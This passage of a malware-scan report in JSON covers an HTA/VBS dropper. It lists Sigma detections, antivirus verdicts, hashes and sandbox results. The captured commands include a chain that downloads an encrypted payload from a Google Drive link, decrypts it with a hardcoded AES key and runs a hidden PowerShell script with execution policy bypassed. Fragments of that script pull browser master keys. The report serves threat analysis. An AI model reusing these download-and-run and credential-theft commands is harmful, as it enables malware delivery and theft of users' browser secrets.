"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local && curl -L -o pipe.log \"https://drive.google.com/uc?export=download&id=1jqpw8UHpsY5ps3nKOfkyo2ql4hC23Mew\" && powershell -Command \"[System.IO.File]::WriteAllBytes('pipe.zip', (New-Object System.Security.Cryptography.AesManaged).CreateDecryptor([System.Text.Encoding]::UTF8.GetBytes('ftrgmjekglgawkxjynqrwxjvjsydxgjc'), [System.Text.Encoding]::UTF8.GetBytes('rhmrpyihmziwkvln')).TransformFinalBlock([System.IO.File]::ReadAllBytes('pip [TRUNCATED]",
"CommandLine": "powershell -Command \"[System.IO.File]::WriteAllBytes('pipe.zip', (New-Object System.Security.Cryptography.AesManaged).CreateDecryptor([System.Text.Encoding]::UTF8.GetBytes('ftrgmjekglgawkxjynqrwxjvjsydxgjc'), [System.Text.Encoding]::UTF8.GetBytes('rhmrpyihmziwkvln')).TransformFinalBlock([System.IO.File]::ReadAllBytes('pipe.log'), 0, [System.IO.File]::ReadAllBytes('pipe.log').Length))\" ",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local && curl -L -o pipe.log \"https://drive.google.com/uc?export=download&id=1jqpw8UHpsY5ps3nKOfkyo2ql4hC23Mew\" && powershell -Command \"[System.IO.File]::WriteAllBytes('pipe.zip', (New-Object System.Security.Cryptography.AesManaged).CreateDecryptor([System.Text.Encoding]::UTF8.GetBytes('ftrgmjekglgawkxjynqrwxjvjsydxgjc'), [System.Text.Encoding]::UTF8.GetBytes('rhmrpyihmziwkvln')).TransformFinalBlock([System.IO.File]::ReadAllBytes('pip [TRUNCATED]",
"CommandLine": "powershell Expand-Archive -Path pipe.zip ",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\pipe\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log",
"CommandLine": "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "%WINDIR%\\syswow64\\windowspowershell\\v1.0\\powershell.exe",
"Image": "C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "%WINDIR%\\system32\\windowspowershell\\v1.0\\powershell.exe",
"Image": "C:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "7cf0b126730658e7c96da1ae0b63c1bb84154a239ca32c09909963038dfdcacf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "PowerShell Script Dropped Via PowerShell.EXE",
"rule_description": "Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Local\\pipe\\1.ps1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "b0d225f3239543a37159ba2855ee1e7972c6bff3c83ce7aed9056599f6ee6314",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Process Discovery With Get-Process",
"rule_description": "Get the processes that are running on the local computer.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "llName -Destination $destpath -ErrorAction SilentlyContinue\r\n\t\t\t} -ErrorAction SilentlyContinue\r\n\t\t}\r\n\t}\r\n}\r\n\r\nfunction GetBrowserData {\r\n\t$extensionpath = \"$storePath\\extensions.txt\"\r\n\t# Edge\r\n\ttry {\r\n\t\t$jsonContent = Get-Content -Path \"$localPath\\Microsoft\\Edge\\User Data\\Local State\" -Raw\r\n\t\t$jsonObject = $jsonContent | ConvertFrom-Json\r\n\t\tUnprotect-Data -encryptedData $jsonObject.os_crypt.encrypted_key -filePath \"$storePath\\edge_masterkey\"\r\n\r\n\t\t$edgeProcess = Get-Process -Name \"msedge\" -Error [TRUNCATED]",
"Path": "",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"MessageTotal": "3",
"EventID": "4104",
"MessageNumber": "2"
}
},
{
"values": {
"ScriptBlockText": " \"Processes:`r`n$(Get-Process | Out-String)\"\r\n\r\n\t\"$systemInfo`r`n$computerInfo`r`n$diskInfo`r`n$volumeInfo`r`n$networkAdapters`r`n$processes`r`n\" | Out-File -FilePath $outputFile\r\n\r\n\t$INSTALLED = Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate\r\n\t$INSTALLED += Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publishe [TRUNCATED]",
"Path": "",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"MessageTotal": "3",
"EventID": "4104",
"MessageNumber": "3"
}
}
]
},
{
"rule_level": "low",
"rule_id": "c085cde9af85b182e783b8d7b42d66d3d0efe08696b4fe7946da3d5d1a2cd51e",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential PowerShell Obfuscation Using Alias Cmdlets",
"rule_description": "Detects Set-Alias or New-Alias cmdlet usage, which can be used as a means to obfuscate PowerShell scripts.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "Set-Alias -Name ncim -Value New-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue",
"Path": "",
"ScriptBlockId": "12efe08e-e053-4aa8-a966-3379bddceabd",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
}
],
"popular_threat_classification": {
"suggested_threat_label": "trojan.adfs/dwnldr",
"popular_threat_category": [
{
"count": 17,
"value": "trojan"
},
{
"count": 7,
"value": "dropper"
},
{
"count": 1,
"value": "downloader"
}
],
"popular_threat_name": [
{
"count": 2,
"value": "adfs"
},
{
"count": 2,
"value": "dwnldr"
},
{
"count": 1,
"value": "crit"
}
]
},
"vba_info": {
"strings": [
"&H137c8",
"&H2991",
"&Hf21e",
"&H16db6",
"&H10fd6",
"&H11e98",
"&H16516",
"&H167f2",
"&H150e",
"&H749",
"&H3133",
"&H103c2",
"&Haa04",
"&H83e6",
"&H11425",
"&Hfbd3",
"&Hc05d",
"&Hc05e",
"&H186e9",
"&H6b7a",
"&H6b7c",
"&H25f",
"&H92d",
"&H2dfb",
"&H5a89",
"&H12212",
"&Hc420",
"&Hcc2e",
"&H12bee",
"&H9f78",
"&H323f",
"&H60ab",
"&H5c4d",
"&H1221d",
"&Hb11e",
"&Hdda",
"&H925",
"&Hccef",
"&H155a4",
"&Hc514",
"&H4934",
"&H4240",
"&H9b12",
"&H7594",
"&H17edd",
"&H9e28",
"&H14ad3",
"&Hba05",
"&H906e",
"&H239f",
"&He267",
"&H11ebe",
"&H11ebc",
"&H1349d",
"&He460",
"&H1f6c",
"&H9c20",
"&H82cf",
"&H16e3a",
"&H3562",
"&Hf812",
"&H14adb",
"&H1277",
"&H1f61",
"&H1f60",
"&H1f65",
"&Hedc",
"&Hb480",
"&H15f3",
"&Hf0dc",
"&H3169",
"&H12141",
"&H6403",
"&H13492",
"&H17f0",
"&H1bcc",
"&H1189f",
"&H7a3f",
"&H11d29",
"&Hc99d",
"&Hc1df",
"&Hf4bb",
"&H813d",
"&H15fb2",
"&H3b4f",
"&H11b25",
"&H105e",
"&H10bed",
"&H17fb9",
"&Ha60d",
"&H22f3",
"&H3830",
"&Hc25",
"&H2c0",
"&H169e5",
"&H63dc",
"&H1464a",
"&He136",
"&H410a",
"&H8005",
"&H151f2",
"&Hdcc0",
"&H8008",
"&H14d74",
"&H17aea",
"&H10780",
"&H1154a",
"&H11094",
"&H3905",
"&H97dc",
"&H16a34",
"&Hdfec",
"&H201b",
"&H132f8",
"&Hd735",
"&H10d01",
"&H4a0",
"&H48b",
"&H2b20",
"&H5c5b",
"&Hc65b",
"&H4a3e",
"&H4a3a",
"&H4a3b",
"&H9a9f",
"&Hd6ab",
"&Hc29d",
"&Haad5",
"&H12d99",
"&Hae75",
"&H6f50",
"&Haf03",
"VBScript",
"&Hf170",
"&H4634",
"&Hae7b",
"&H151d",
"&H474a",
"&H12bd7",
"&H12bd1",
"&H160d6",
"&He736",
"&Ha34f",
"&H7ef6",
"&Hbdde",
"&Haba4",
"&H2aad",
"&H766a",
"&H425f",
"&Hf0e9",
"&H13301",
"&H13001",
"&H17a30",
"&H11a69",
"&H1244a",
"&Hc674",
"&H1266",
"&Hfd9b",
"&H10f32",
"&H12ff4",
"&H156f0",
"&H1750b",
"&H6eb5",
"&H12161",
"&H377a",
"&H1395f",
"&H13318",
"&H8e74",
"&Hb653",
"&H3174",
"&Hdbd9",
"&Ha631",
"&H13174",
"&H1704a",
"&H9833",
"&H9831",
"&H16ce0",
"&H8059",
"&He3e6",
"&Hb3cd",
"&H129aa",
"&H1688",
"&H151eb",
"&H16fbc",
"&Hcbaa",
"&H11dc9",
"&Hfe40",
"&H4f5a",
"&H3c7f",
"&Hb68",
"&H44a9",
"&H9f0",
"&H42cc",
"&H15de2",
"&H16fb3",
"&H84df",
"&H11205",
"&Hab94",
"&H3e67",
"&H1679f",
"&H121c0",
"&H11841",
"&Hd1b5",
"&H16311",
"&H16317",
"&H16315",
"&Hb81e",
"&H11442",
"&H5f90",
"&H14d6e",
"&Ha4dc",
"&H97eb",
"&H8bd",
"&H3cb3",
"&Hc443",
"&H2d30",
"&H150a7",
"&H4646",
"&H14cc7",
"&Hda5b",
"&H2ff7",
"&H2d3e",
"&H1600b",
"&H1738d",
"&H15e70",
"&Hbde1",
"&H100c5",
"&Haa2c",
"&H15e9c",
"&H3fbd",
"&H45b9",
"&H11bb6",
"&H10e36",
"&H12c1f",
"&H4c00",
"&Hc5fa",
"&H117a4",
"&Hcee3",
"&H13aa9",
"&H682d",
"&H94c0",
"&H8a49",
"&H8e6f",
"&Heeca",
"&Hbac2",
"&H3364",
"&Ha356",
"&H1212",
"&H1a9c",
"&H2092",
"&H10942",
"&Hd0ff",
"&H1278b",
"&H107a8",
"&Hf943",
"&H153a5",
"&H37c4",
"&H17d4",
"&H2784",
"&Hdbe7",
"&H4f6b",
"&Hed59",
"&H1fae",
"&H13e56",
"&H1511f",
"&H922b",
"&Hc2b4",
"&H1433a",
"&Hcf72",
"&H5526",
"&H11b01",
"&Hd9b4",
"&H71db",
"&Ha0e4",
"&H84e7",
"&H5780",
"&H982d",
"&H63f6",
"&H3b27",
"&H15757",
"&Ha2a",
"&H9958",
"&Hfa5b",
"&H129b8",
"&H151d0",
"&H129b6",
"cmd /c cd /d %localappdata% && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log",
"&H16a19",
"&Hdcae",
"&H8971",
"&H182d4",
"&H1681d",
"&Hfd45",
"&H130de",
"&H13a7f",
"&H63f5",
"&H10ac8",
"&He845",
"&H87de",
"&H129bf"
]
},
"last_modification_date": 1781345471,
"times_submitted": 1,
"last_analysis_results": {
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": "8.2.40(8338)",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260608",
"category": "malicious",
"result": "Trojan.Script.Generic.4!c"
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260610",
"category": "malicious",
"result": "Trojan.Generic.40040488"
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"Skyhigh": {
"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": "v2021.2.0+4045",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"ALYac": {
"method": "blacklist",
"engine_name": "ALYac",
"engine_version": "2.0.0.10",
"engine_update": "20260610",
"category": "malicious",
"result": "Trojan.Script.Agent"
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.238",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5618",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260608",
"category": "undetected",
"result": null
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20230417",
"category": "undetected",
"result": null
},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.57.59770",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.57.59769",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260609",
"category": "malicious",
"result": "Trojan.Generic.D262F828"
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1224",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260610",
"category": "malicious",
"result": "Trojan.Gen.NPE"
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260610",
"category": "malicious",
"result": "VBS/TrojanDropper.Agent.PMU trojan"
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260610",
"category": "malicious",
"result": "Script:SNH-gen [Drp]"
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260610",
"category": "malicious",
"result": "Malicious (score: 99)"
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260610",
"category": "malicious",
"result": "HEUR:Trojan.Script.Generic"
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260610",
"category": "malicious",
"result": "Trojan.Generic.40040488"
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260610",
"category": "malicious",
"result": "Trojan.Script.Dropper.kypbnp"
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260610",
"category": "malicious",
"result": "Script.Trojan.Generic.Rgil"
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.5.1.0",
"engine_update": "20260610",
"category": "malicious",
"result": "VBS/DwnLdr-ADFS"
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260610",
"category": "malicious",
"result": "Dropper.DR/SNH"
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260609",
"category": "malicious",
"result": "Trojan.Generic.40040488"
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.14833",
"engine_update": "20260610",
"category": "malicious",
"result": "ti!3E9F88021FB7"
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260610",
"category": "malicious",
"result": "txt.trojan.generic"
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260610",
"category": "malicious",
"result": "Trojan.Generic.40040488 (B)"
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "29d3768:29d3768:4ff9544:4ff9544",
"engine_update": "20260609",
"category": "malicious",
"result": "TrojanDropper/VBS.Runner.b!crit"
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260610",
"category": "malicious",
"result": "DR/SNH"
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"Kingsoft": {
"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"Gridinsoft": {
"method": "blacklist",
"engine_name": "Gridinsoft",
"engine_version": "1.0.247.174",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": "38713",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26050.11",
"engine_update": "20260610",
"category": "malicious",
"result": "Trojan:Win32/Ravartar!rfn"
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260610",
"category": "malicious",
"result": "VBS.S.Agent.58841"
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.25-116107407",
"engine_update": "20260610",
"category": "malicious",
"result": "VBS/DwnLdr-ADFS"
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44856AVA:64.31389",
"engine_update": "20260610",
"category": "malicious",
"result": "Trojan.Generic.40040488"
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260610",
"category": "malicious",
"result": "VBS/Downldr.TI"
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.30.0.10666",
"engine_update": "20260610",
"category": "malicious",
"result": "Downloader/VBS.Generic"
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": "5.6.1",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-06-10.01",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260610",
"category": "malicious",
"result": "Dropper.Agent/VBS!1.137C0 (CLASSIC)"
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260610",
"category": "undetected",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.5.4.0",
"engine_update": "20260609",
"category": "malicious",
"result": "Trojan-Dropper.VBS.Agent"
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.48.0",
"engine_update": "20260610",
"category": "malicious",
"result": "VBS/Agent.PMU!tr"
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260610",
"category": "malicious",
"result": "Script:SNH-gen [Drp]"
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260609",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "malicious",
"result": "Trojan[dropper]:Win/Generic.Gen"
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": null,
"engine_update": "20260610",
"category": "failure",
"result": null
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260609-00",
"engine_update": "20260609",
"category": "type-unsupported",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": null,
"engine_update": "20260610",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.265",
"engine_update": "20260609",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.786",
"engine_update": "20260607",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260610",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.12.0",
"engine_update": "20260604",
"category": "type-unsupported",
"result": null
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "type-unsupported",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.9.0.8",
"engine_update": "20250227",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260521",
"category": "type-unsupported",
"result": null
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.3.2",
"engine_update": "20260608",
"category": "type-unsupported",
"result": null
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260610",
"category": "type-unsupported",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260608",
"category": "type-unsupported",
"result": null
}
},
"meaningful_name": "d4498e6b-2232-4f15-bbc2-a8dae6303b85",
"unique_sources": 1,
"last_submission_date": 1778753102,
"size": 58841,
"magic": "HTML document, ASCII text, with CRLF line terminators",
"total_votes": {
"harmless": 0,
"malicious": 1
},
"type_tag": "vba",
"first_submission_date": 1778753102,
"type_description": "VBA",
"names": [
"d4498e6b-2232-4f15-bbc2-a8dae6303b85",
"pdfko[1].zip",
"sleestak_payload_1.hta",
"octet-stream"
],
"sha256": "3e9f88021fb7e50802fd0cd0aeb026215c2740119e5bc0847f99a4464c182ba8",
"md5": "0db53f4bbd5ca58c7a49994ca525ffcd",
"crowdsourced_ids_stats": {
"high": 0,
"medium": 1,
"low": 0,
"info": 0
},
"filecondis": {
"dhash": "e4e0a50084c6a0e0",
"raw_md5": "824daa5e89a99995b3d5d96a4327f4a8"
},
"ssdeep": "384:jstTWr8656/OMvhp4cFLraTrDIFP+SJtmjBe3Z8W0OLvZB0/HlBwTz1cfsdBBYGj:AtdJ51FLraTrkJt6IJ8WboflCLJSpXG",
"sha1": "df0ed60b6a989f51ac9cd6f367f25bd98c4bdd53",
"vhash": "cd87f260341667ed16d5513989cc815f",
"reputation": -1,
"type_tags": [
"source",
"vba",
"vbs"
],
"last_analysis_date": 1781068766,
"trid": [
{
"file_type": "file seems to be plain text/ASCII",
"probability": 0.0
}
],
"tlsh": "T17A4323428D383CED909F65A72DF310441192DE1A7FBB6473C12724B4193AAD87AE1EF6",
"sigma_analysis_summary": {
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 4,
"medium": 9,
"low": 5
}
},
"sandbox_verdicts": {
"Dr.Web vxCube": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "Dr.Web vxCube"
}
},
"crowdsourced_ids_results": [
{
"rule_category": "denial-of-service",
"alert_severity": "medium",
"rule_msg": "SERVER-OTHER Squid HTTP Vary response header denial of service attempt",
"rule_id": "1:41379",
"rule_source": "Snort registered user ruleset",
"rule_url": "https://www.snort.org/downloads/#rule-downloads",
"rule_raw": "alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:\"SERVER-OTHER Squid HTTP Vary response header denial of service attempt\"; flow:to_client,established; http_header; content:\"Vary|3A|\"; content:!\"|0D 0A|\",within 250; metadata:policy max-detect-ips drop; service:http; reference:cve,2016-2569; reference:url,www.squid-cache.org/Advisories/SQUID-2016_2.txt; classtype:denial-of-service; sid:41379; rev:1; )",
"rule_references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=2016-2569",
"https://www.squid-cache.org/Advisories/SQUID-2016_2.txt"
],
"alert_context": [
{
"src_ip": "74.125.205.94",
"src_port": 80
}
]
}
],
"magika": "VBA",
"last_analysis_stats": {
"malicious": 31,
"suspicious": 0,
"undetected": 29,
"harmless": 0,
"timeout": 0,
"confirmed-timeout": 0,
"failure": 1,
"type-unsupported": 14
},
"tags": [
"powershell",
"vba",
"run-file",
"obfuscated",
"enum-windows"
],
"sigma_analysis_stats": {
"critical": 0,
"high": 4,
"medium": 9,
"low": 5
}
}
}
}